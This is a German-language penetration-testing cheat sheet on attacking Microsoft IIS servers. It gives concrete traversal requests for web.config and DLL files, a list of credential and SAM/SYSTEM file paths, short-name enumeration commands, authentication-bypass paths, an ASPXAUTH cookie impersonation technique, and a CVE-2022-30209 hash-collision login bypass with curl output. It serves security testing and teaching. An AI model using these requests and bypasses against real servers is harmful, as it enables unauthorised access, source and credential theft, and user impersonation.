IIS - Internet Information Services

Reading time: 11 minutes

Testen Sie ausführbare Dateierweiterungen:

• asp
• aspx
• config
• php

Offenlegung der internen IP-Adresse

Auf jedem IIS-Server, auf dem Sie einen 302 erhalten, können Sie versuchen, den Host-Header zu entfernen und HTTP/1.0 zu verwenden. Im Antwortheader könnte der Location-Header auf die interne IP-Adresse verweisen:

nc -v domain.com 80
openssl s_client -connect domain.com:443

Antwort, die die interne IP offenbart:

GET / HTTP/1.0

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Location: https://192.168.5.237/owa/
Server: Microsoft-IIS/10.0
X-FEServer: NHEXCHANGE2016

.config-Dateien ausführen

Sie können .config-Dateien hochladen und sie verwenden, um Code auszuführen. Eine Möglichkeit, dies zu tun, besteht darin, den Code am Ende der Datei innerhalb eines HTML-Kommentars anzufügen: Beispiel hier herunterladen

Weitere Informationen und Techniken zur Ausnutzung dieser Schwachstelle hier

IIS Discovery Bruteforce

Laden Sie die Liste herunter, die ich erstellt habe:

{% file src="../../images/iisfinal.txt" %}

Sie wurde erstellt, indem die Inhalte der folgenden Listen zusammengeführt wurden:

https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt
http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html
https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt
https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt

Verwenden Sie es, ohne eine Erweiterung hinzuzufügen, die Dateien, die sie benötigen, haben sie bereits.

Pfad Traversierung

Quellcode-Leckage

Überprüfen Sie den vollständigen Bericht unter: https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html

In .Net MVC-Anwendungen spielt die web.config-Datei eine entscheidende Rolle, indem sie jede Binärdatei angibt, auf die die Anwendung über "assemblyIdentity" XML-Tags angewiesen ist.

Binärdateien erkunden

Ein Beispiel für den Zugriff auf die web.config-Datei ist unten dargestellt:

GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
Host: example-mvc-application.minded

Diese Anfrage zeigt verschiedene Einstellungen und Abhängigkeiten, wie zum Beispiel:

• EntityFramework-Version
• AppSettings für Webseiten, Client-Validierung und JavaScript
• System.web-Konfigurationen für Authentifizierung und Laufzeit
• System.webServer-Modul-Einstellungen
• Runtime-Assembly-Bindungen für zahlreiche Bibliotheken wie Microsoft.Owin, Newtonsoft.Json und System.Web.Mvc

Diese Einstellungen deuten darauf hin, dass bestimmte Dateien, wie /bin/WebGrease.dll, im /bin-Ordner der Anwendung zu finden sind.

Root-Verzeichnisdateien

Dateien, die im Root-Verzeichnis gefunden werden, wie /global.asax und /connectionstrings.config (die sensible Passwörter enthält), sind entscheidend für die Konfiguration und den Betrieb der Anwendung.

Namespaces und Web.Config

MVC-Anwendungen definieren auch zusätzliche web.config-Dateien für spezifische Namespaces, um wiederholte Deklarationen in jeder Datei zu vermeiden, wie mit einer Anfrage zum Herunterladen einer anderen web.config demonstriert:

GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
Host: example-mvc-application.minded

Herunterladen von DLLs

Die Erwähnung eines benutzerdefinierten Namensraums deutet auf eine DLL mit dem Namen "WebApplication1" hin, die im /bin-Verzeichnis vorhanden ist. Daraufhin wird eine Anfrage zum Herunterladen der WebApplication1.dll angezeigt:

GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
Host: example-mvc-application.minded

Dies deutet auf das Vorhandensein anderer wesentlicher DLLs hin, wie System.Web.Mvc.dll und System.Web.Optimization.dll, im /bin-Verzeichnis.

In einem Szenario, in dem eine DLL einen Namespace namens WebApplication1.Areas.Minded importiert, könnte ein Angreifer auf die Existenz anderer web.config-Dateien in vorhersehbaren Pfaden schließen, wie z.B. /area-name/Views/, die spezifische Konfigurationen und Verweise auf andere DLLs im /bin-Ordner enthalten. Zum Beispiel kann eine Anfrage an /Minded/Views/web.config Konfigurationen und Namespaces offenbaren, die auf das Vorhandensein einer anderen DLL, WebApplication1.AdditionalFeatures.dll, hinweisen.

Häufige Dateien

Von hier

C:\Apache\conf\httpd.conf
C:\Apache\logs\access.log
C:\Apache\logs\error.log
C:\Apache2\conf\httpd.conf
C:\Apache2\logs\access.log
C:\Apache2\logs\error.log
C:\Apache22\conf\httpd.conf
C:\Apache22\logs\access.log
C:\Apache22\logs\error.log
C:\Apache24\conf\httpd.conf
C:\Apache24\logs\access.log
C:\Apache24\logs\error.log
C:\Documents and Settings\Administrator\NTUser.dat
C:\php\php.ini
C:\php4\php.ini
C:\php5\php.ini
C:\php7\php.ini
C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache\logs\access.log
C:\Program Files (x86)\Apache Group\Apache\logs\error.log
C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache2\logs\access.log
C:\Program Files (x86)\Apache Group\Apache2\logs\error.log
c:\Program Files (x86)\php\php.ini"
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache\conf\logs\access.log
C:\Program Files\Apache Group\Apache\conf\logs\error.log
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\logs\access.log
C:\Program Files\Apache Group\Apache2\conf\logs\error.log
C:\Program Files\FileZilla Server\FileZilla Server.xml
C:\Program Files\MySQL\my.cnf
C:\Program Files\MySQL\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.1\my.cnf
C:\Program Files\MySQL\MySQL Server 5.1\my.ini
C:\Program Files\MySQL\MySQL Server 5.5\my.cnf
C:\Program Files\MySQL\MySQL Server 5.5\my.ini
C:\Program Files\MySQL\MySQL Server 5.6\my.cnf
C:\Program Files\MySQL\MySQL Server 5.6\my.ini
C:\Program Files\MySQL\MySQL Server 5.7\my.cnf
C:\Program Files\MySQL\MySQL Server 5.7\my.ini
C:\Program Files\php\php.ini
C:\Users\Administrator\NTUser.dat
C:\Windows\debug\NetSetup.LOG
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\php.ini
C:\Windows\repair\SAM
C:\Windows\repair\system
C:\Windows\System32\config\AppEvent.evt
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\RegBack\system
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SecEvent.evt
C:\Windows\System32\config\SysEvent.evt
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\winevt\Logs\Application.evtx
C:\Windows\System32\winevt\Logs\Security.evtx
C:\Windows\System32\winevt\Logs\System.evtx
C:\Windows\win.ini
C:\xampp\apache\conf\extra\httpd-xampp.conf
C:\xampp\apache\conf\httpd.conf
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\MERCURY.INI
C:\xampp\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\security\webdav.htpasswd
C:\xampp\sendmail\sendmail.ini
C:\xampp\tomcat\conf\server.xml

HTTPAPI 2.0 404 Fehler

Wenn Sie einen Fehler wie den folgenden sehen:

bedeutet das, dass der Server den korrekten Domainnamen im Host-Header nicht erhalten hat.
Um auf die Webseite zuzugreifen, könnten Sie das SSL-Zertifikat überprüfen und vielleicht finden Sie dort den Domain-/Subdomainnamen. Wenn es dort nicht vorhanden ist, müssen Sie möglicherweise VHosts brute forcen, bis Sie den richtigen finden.

Alte IIS-Sicherheitsanfälligkeiten, nach denen es sich zu suchen lohnt

Microsoft IIS Tilde-Zeichen “~” Sicherheitsanfälligkeit/Funktion – Offenlegung kurzer Datei-/Ordnernamen

Sie können versuchen, Ordner und Dateien in jedem entdeckten Ordner aufzulisten (auch wenn dies eine Basisauthentifizierung erfordert) mit dieser Technik.
Die Hauptbeschränkung dieser Technik, wenn der Server anfällig ist, besteht darin, dass sie nur die ersten 6 Buchstaben des Namens jeder Datei/jedes Ordners und die ersten 3 Buchstaben der Erweiterung der Dateien finden kann.

Sie können https://github.com/irsdl/IIS-ShortName-Scanner verwenden, um diese Sicherheitsanfälligkeit zu testen: java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/

Ursprüngliche Forschung: https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf

Sie können auch metasploit verwenden: use scanner/http/iis_shortname_scanner

Eine gute Idee, um den endgültigen Namen der entdeckten Dateien zu finden, ist, LLMs nach Optionen zu fragen, wie es im Skript https://github.com/Invicti-Security/brainstorm/blob/main/fuzzer_shortname.py gemacht wird.

Umgehung der Basisauthentifizierung

Umgehen Sie eine Basisauthentifizierung (IIS 7.5) und versuchen Sie, auf Folgendes zuzugreifen: /admin:$i30:$INDEX_ALLOCATION/admin.php oder /admin::$INDEX_ALLOCATION/admin.php

Sie können versuchen, diese Sicherheitsanfälligkeit mit der letzten zu kombinieren, um neue Ordner zu finden und die Authentifizierung zu umgehen.

ASP.NET Trace.AXD aktivierte Debugging

ASP.NET enthält einen Debugging-Modus, und die Datei heißt trace.axd.

Es führt ein sehr detailliertes Protokoll aller Anfragen, die über einen bestimmten Zeitraum an eine Anwendung gestellt wurden.

Diese Informationen umfassen die IPs der Remote-Clients, Sitzungs-IDs, alle Anfrage- und Antwort-Cookies, physische Pfade, Quellcodeinformationen und möglicherweise sogar Benutzernamen und Passwörter.

https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/

ASPXAUTH Cookie

ASPXAUTH verwendet die folgenden Informationen:

• validationKey (string): hex-kodierter Schlüssel zur Verwendung für die Signaturvalidierung.
• decryptionMethod (string): (Standard “AES”).
• decryptionIV (string): hex-kodierter Initialisierungsvektor (Standard ist ein Vektor aus Nullen).
• decryptionKey (string): hex-kodierter Schlüssel zur Verwendung für die Entschlüsselung.

Einige Personen verwenden jedoch die Standardwerte dieser Parameter und verwenden als Cookie die E-Mail des Benutzers. Daher, wenn Sie eine Webseite finden, die die gleiche Plattform verwendet und das ASPXAUTH-Cookie verwendet, und Sie einen Benutzer mit der E-Mail des Benutzers, den Sie nachahmen möchten, auf dem angegriffenen Server erstellen, könnten Sie in der Lage sein, das Cookie vom zweiten Server im ersten zu verwenden und den Benutzer nachzuahmen.
Dieser Angriff funktionierte in diesem Bericht.

IIS-Authentifizierungsumgehung mit zwischengespeicherten Passwörtern (CVE-2022-30209)

Der vollständige Bericht hier: Ein Fehler im Code überprüfte das vom Benutzer angegebene Passwort nicht ordnungsgemäß, sodass ein Angreifer, dessen Passworthash einen Schlüssel trifft, der bereits im Cache ist, sich als dieser Benutzer anmelden kann.

# script for sanity check
> type test.py
def HashString(password):
j = 0
for c in map(ord, password):
j = c + (101*j)&0xffffffff
return j

assert HashString('test-for-CVE-2022-30209-auth-bypass') == HashString('ZeeiJT')

# before the successful login
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 401 Unauthorized

# after the successful login
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 200 OK